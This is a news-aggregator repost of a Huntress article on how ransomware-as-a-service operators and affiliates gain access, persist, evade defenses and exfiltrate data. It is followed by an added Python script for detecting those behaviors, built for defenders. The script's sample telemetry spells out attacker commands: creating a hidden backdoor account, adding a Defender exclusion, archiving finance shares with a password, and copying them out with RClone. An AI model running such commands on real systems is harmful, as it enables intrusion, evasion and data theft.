Security News

Cybersecurity news aggregator

HIGH Attacks Huntress

Inside the RaaS Ecosystem: Operators, Affiliates & Attack Tradecraft | Huntress

The article describes the Ransomware-as-a-Service (RaaS) ecosystem as a distributed threat model where operators provide the ransomware and infrastructure, while affiliates and Initial Access Brokers (IABs) independently handle the initial compromise and hands-on-keyboard tradecraft. This means a single ransomware family can be deployed via diverse attack vectors like phishing, RDP compromise, or abuse of legitimate RMM tools, with no consistent playbook. Defenders are therefore warned that attribution to a specific ransomware brand does not reveal the intrusion chain or attacker behaviors, which are dictated by the individual affiliate.

Beyond the RaaS Headlines: The Reality of Ransomware Tradecraft

Published: May 20, 2026
By: Harlan Carvey, Lindsey O'Donnell-Welch

Ransomware actors following a ransomware-as-a-service (RaaS) model are often described as one cohesive threat actor. But reality, and what we see in actual incidents, is far different. RaaS powers an ecosystem made up of ransomware operators, affiliates, and initial access brokers (IABs). That structure is important because it means the name on the ransom note or in the encrypted file extension doesn't reliably explain how an intrusion started or what actions the attacker took (recon, data theft, etc.) in the victim's environment.

The same ransomware family (whether it's Akira, Qilin, or LockBit) can show up across very different intrusion chains. One attack may start with phishing or a help-desk scam. Another may begin with exposed RDP, and yet another may come through a rogue remote monitoring and management (RMM) tool. That means defenders cannot assume that one ransomware brand equals one consistent playbook. In many cases, it is the affiliate, and not the ransomware operator, that dictates the tradecraft.

During this month's Tradecraft Tuesday, Huntress' Harlan Carvey, Principal Threat Intelligence Analyst, and Lindsey O'Donnell-Welch, Principal Technical Community Engagement Writer, explained how the RaaS economy plays out in attacker tradecraft during on-the-ground incidents.

What is RaaS?

But first, what is RaaS? At a high level, the business model is straightforward. Ransomware operators provide, maintain, and update the variant itself, and manage ransomware infrastructure, including leak sites and post-compromise ransom negotiations. Affiliates handle the "dirty work" across victim environments, including recon, initial access, hands-on-keyboard activity, any data theft, and deploying the file encryptor.
For example, in practice, Qilin operators maintain the ransomware, recruit affiliates, and provide the surrounding business infrastructure, including leak sites, payment portals, and even legal support functions. Meanwhile, Qilin's range of affiliates shows why attribution gets messy. Its affiliate base is unusually diverse, spanning actors like Scattered Spider, Moonstone Sleet, and Devman. That means one ransomware brand can sit behind very different intrusion styles, skill levels, and operational behaviors.

Figure 1: A breakdown of how the Qilin RaaS model works

Initial access: What we see

One of the clearest realities in ransomware intrusions is that initial access is all over the map. Access may come through social engineering, remote access services, or a pre-existing foothold purchased from an IAB. Threat actors continue to abuse legitimate tools and pathways because they blend in. We see ransomware affiliates gaining initial access via:

- Remote Desktop Protocol: threat actors use weak or compromised RDP credentials, or even enable RDP via the SMB protocol or Microsoft SQL Server (MSSQL)
- Vulnerable edge appliances: in 2025, threat actors targeted SonicWall VPNs before deploying Akira ransomware
- Rogue RMMs: threat actors use RMMs like ScreenConnect, TeamViewer, or Bomgar to get into the victim's environment

When RMMs are involved in MSP-centric environments, one compromised instance can open the door to many downstream victims at once. That's what we saw with an incident detected on April 14, when a ransomware campaign hit multiple organizations through a compromised Bomgar remote support environment belonging to a dental software company whose software is installed across dozens of organizations.

Figure 2: In April, threat actors used Bomgar to gain access to multiple organization environments before deploying ransomware.

Ransomware persistence, defense evasion, and exfiltration

Persistence in ransomware intrusions stems from a variety of methods.
For example, threat actors will create new users, and some will also take steps to "hide" those accounts from the Welcome Screen visible via Terminal Services/RDP. They may also install RMMs after the initial compromise to retain access, including Chrome Remote Desktop and AnyDesk.

Figure 3: In a March incident, ransomware actors used Chrome Remote Desktop and AnyDesk

These persistence mechanisms may look basic, but they keep the intrusion alive long enough for the threat actor to reach the next phase of the attack, including exfiltration or encryption.

We also see various defense evasion techniques. Some attackers do very little to cover their tracks; others use Defender exclusions. Sometimes, however, threat actors use more aggressive tactics, such as EDR and AV killers or Bring Your Own Vulnerable Driver (BYOVD) activity. While these attempt to fully remove security tools, it's worth noting that EDR killers are often noisy.

Ransomware actors stage data by consolidating and compressing it into encrypted archives using tools like 7-Zip. For the exfiltration itself, we've seen various techniques, including the cloud storage tools MegaSync and RClone, as well as S5cmd and even finger.exe.

Figure 4: Different types of data staging and exfiltration techniques

Rethinking ransomware

The most useful way to think about ransomware is not as a fixed actor, but as a shifting intrusion model. The payload name tells you what was deployed. It does not tell you enough about the access path, the persistence mechanisms, the controls that failed, or the tradecraft that got the attacker to the finish line. That is why the security fundamentals still matter so much.
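The following script is an added example, not Huntress code, that turns the post's point into something a responder can run: it rebuilds the intrusion chain (access path, persistence, defense evasion, staging, exfiltration) from endpoint telemetry rather than from the ransomware brand, covering both the initial-access list above (external RDP logons, unapproved RMM clients) and the persistence, Defender-exclusion and exfiltration-tool behaviors just described. The event format, the RMM allowlist, the RMM client process names and the sample timeline are constructed assumptions; the exfiltration and staging tool names are those the post names, and the registry key used to hide an account from the Welcome Screen is the well-known Winlogon SpecialAccounts\UserList key.

```python
"""Reconstruct a ransomware intrusion chain from endpoint telemetry.

Added example (not Huntress code). The event format, the RMM allowlist, the
process names and the sample timeline are constructed assumptions.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Assumed allowlist: RMM clients an organisation expects on its hosts.
APPROVED_RMM = {"screenconnect.client.exe"}
# Client process names for the RMMs the post names (assumed; adjust to your fleet).
# Chrome Remote Desktop's host process is remoting_host.exe.
RMM_BINARIES = {"screenconnect.client.exe", "teamviewer.exe", "bomgar-scc.exe",
                "remoting_host.exe", "anydesk.exe"}
EXFIL_TOOLS = {"rclone.exe", "megasync.exe", "s5cmd.exe", "finger.exe"}
STAGING_TOOLS = {"7z.exe", "7za.exe"}
# Well-known key: a DWORD 0 named after an account hides it from the Welcome Screen.
HIDE_USER_KEY = (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                 r"\Winlogon\SpecialAccounts\UserList")
# Only these ranges count as internal; an RDP logon from anywhere else is suspect.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]
PHASES = ("initial_access", "persistence", "defense_evasion",
          "collection", "exfiltration")


@dataclass
class Finding:
    ts: str
    phase: str
    detail: str


def is_external(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def classify(ev: dict, chain_started: bool) -> Optional[Finding]:
    """Map one telemetry event to an intrusion phase, or None if unremarkable."""
    if ev["kind"] == "logon":
        # Logon type 10 is RemoteInteractive, i.e. RDP.
        if ev.get("logon_type") == 10 and is_external(ev.get("src_ip", "")):
            return Finding(ev["ts"], "initial_access",
                           f"RDP logon as {ev['user']} from external {ev['src_ip']}")
        return None
    if ev["kind"] == "registry":
        if ev["key"].lower().startswith(HIDE_USER_KEY.lower()) and ev.get("data") == 0:
            hidden = ev["key"].rsplit("\\", 1)[-1]
            return Finding(ev["ts"], "persistence", f"account {hidden} hidden from Welcome screen")
        return None
    if ev["kind"] != "process":
        return None
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    tokens = ev.get("cmdline", "").lower().split()
    if image in RMM_BINARIES and image not in APPROVED_RMM:
        # An unexpected RMM before any other finding is the likely access path;
        # one appearing after the chain has started is a persistence channel.
        phase = "persistence" if chain_started else "initial_access"
        return Finding(ev["ts"], phase, f"unapproved RMM client {image} started")
    if image in {"net.exe", "net1.exe"} and "user" in tokens and "/add" in tokens:
        return Finding(ev["ts"], "persistence",
                       f"local account created: {tokens[tokens.index('user') + 1]}")
    if (image in {"powershell.exe", "pwsh.exe"} and "add-mppreference" in tokens
            and any(t.startswith("-exclusion") for t in tokens)):
        return Finding(ev["ts"], "defense_evasion", "Defender exclusion added")
    if image in STAGING_TOOLS and "a" in tokens and any(t.startswith("-p") for t in tokens):
        return Finding(ev["ts"], "collection", "password-protected archive created")
    if image in EXFIL_TOOLS:
        return Finding(ev["ts"], "exfiltration", f"{image} executed")
    return None


def build_chain(events) -> list:
    """Order events by time and keep those that map to a phase."""
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        f = classify(ev, chain_started=bool(findings))
        if f is not None:
            findings.append(f)
    return findings


def summarize(findings) -> dict:
    """Group findings by phase, in kill-chain order, for the incident write-up."""
    summary = {p: [] for p in PHASES}
    for f in findings:
        summary[f.phase].append(f.detail)
    return summary


# Constructed sample telemetry from one host, loosely modelled on the post's
# rogue-RMM, hidden-account, Defender-exclusion and RClone scenarios.
SAMPLE_EVENTS = [
    {"ts": "2026-04-14T02:11:05", "kind": "process", "image": r"C:\ProgramData\bomgar-scc.exe", "cmdline": "bomgar-scc.exe"},
    {"ts": "2026-04-14T02:15:22", "kind": "process", "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.Client.exe", "cmdline": "ScreenConnect.Client.exe"},
    {"ts": "2026-04-14T02:18:09", "kind": "logon", "logon_type": 10, "user": "admin.jsmith", "src_ip": "10.20.0.5"},
    {"ts": "2026-04-14T02:20:31", "kind": "process", "image": r"C:\Windows\System32\net.exe", "cmdline": "net user svc_backup Passw0rd! /add"},
    {"ts": "2026-04-14T02:21:02", "kind": "registry", "key": HIDE_USER_KEY + r"\svc_backup", "data": 0},
    {"ts": "2026-04-14T02:25:47", "kind": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": r"powershell.exe Add-MpPreference -ExclusionPath C:\ProgramData\tmp"},
    {"ts": "2026-04-14T02:40:13", "kind": "process", "image": r"C:\ProgramData\tmp\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"ts": "2026-04-14T03:02:15", "kind": "process", "image": r"C:\ProgramData\tmp\7z.exe", "cmdline": r"7z.exe a -pHunt3r C:\ProgramData\tmp\fin.7z C:\Shares\Finance"},
    {"ts": "2026-04-14T03:10:00", "kind": "process", "image": r"C:\Program Files\7-Zip\7z.exe", "cmdline": r"7z.exe x C:\Updates\patch.7z"},
    {"ts": "2026-04-14T03:40:58", "kind": "process", "image": r"C:\ProgramData\tmp\rclone.exe", "cmdline": r"rclone.exe copy C:\ProgramData\tmp\fin.7z remote:bk"},
]

if __name__ == "__main__":
    for phase, details in summarize(build_chain(SAMPLE_EVENTS)).items():
        print(f"{phase:16} {details}")
```

Run as-is it prints the constructed host's chain with Bomgar as the access path, the hidden svc_backup account and AnyDesk as persistence, a Defender exclusion as evasion, a password-protected 7-Zip archive as staging and RClone as the exfiltration channel, while the approved ScreenConnect client, the internal RDP logon and the plain 7-Zip extraction are left alone. The one design choice worth noting is that the same unapproved RMM is filed as initial access or as persistence depending on whether anything suspicious preceded it, which is exactly the distinction the post draws between rogue RMMs as an entry point and RMMs installed post-compromise; the phase labels, not the payload name, are what should drive the investigation.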
We recommend defenders take the following steps to protect their organizations:

- Maintain an asset inventory
- Reduce your attack surface
- Deploy monitoring broadly
- If you've already been compromised, investigate the incident without making assumptions based on branding alone

If the real intrusion path is missed, the same foothold can remain available for a return attack later, including under a different ransomware banner entirely.
